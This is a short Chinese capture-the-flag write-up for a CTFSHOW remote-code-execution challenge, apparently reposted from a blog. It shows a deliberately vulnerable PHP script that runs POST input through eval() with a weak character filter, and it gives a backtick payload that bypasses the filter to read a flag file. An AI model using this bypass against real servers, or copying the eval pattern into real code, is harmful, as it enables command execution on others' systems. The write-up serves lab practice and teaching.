RCE挑战1
<?php error_reporting(0); highlight_file(__FILE__); $code = $_POST['code']; $code = str_replace("(","括号",$code); $code = str_replace(".","点",$code); eval($code); ?>
把"."和"("进行了过滤,我们可以用``进行命令执行。
POST:
pyaload:code=echo `cat /f1agaaa`;
标签:code,pyaload,echo,CTFSHOW,f1agaaa,cat From: https://www.cnblogs.com/kode00/p/17437262.html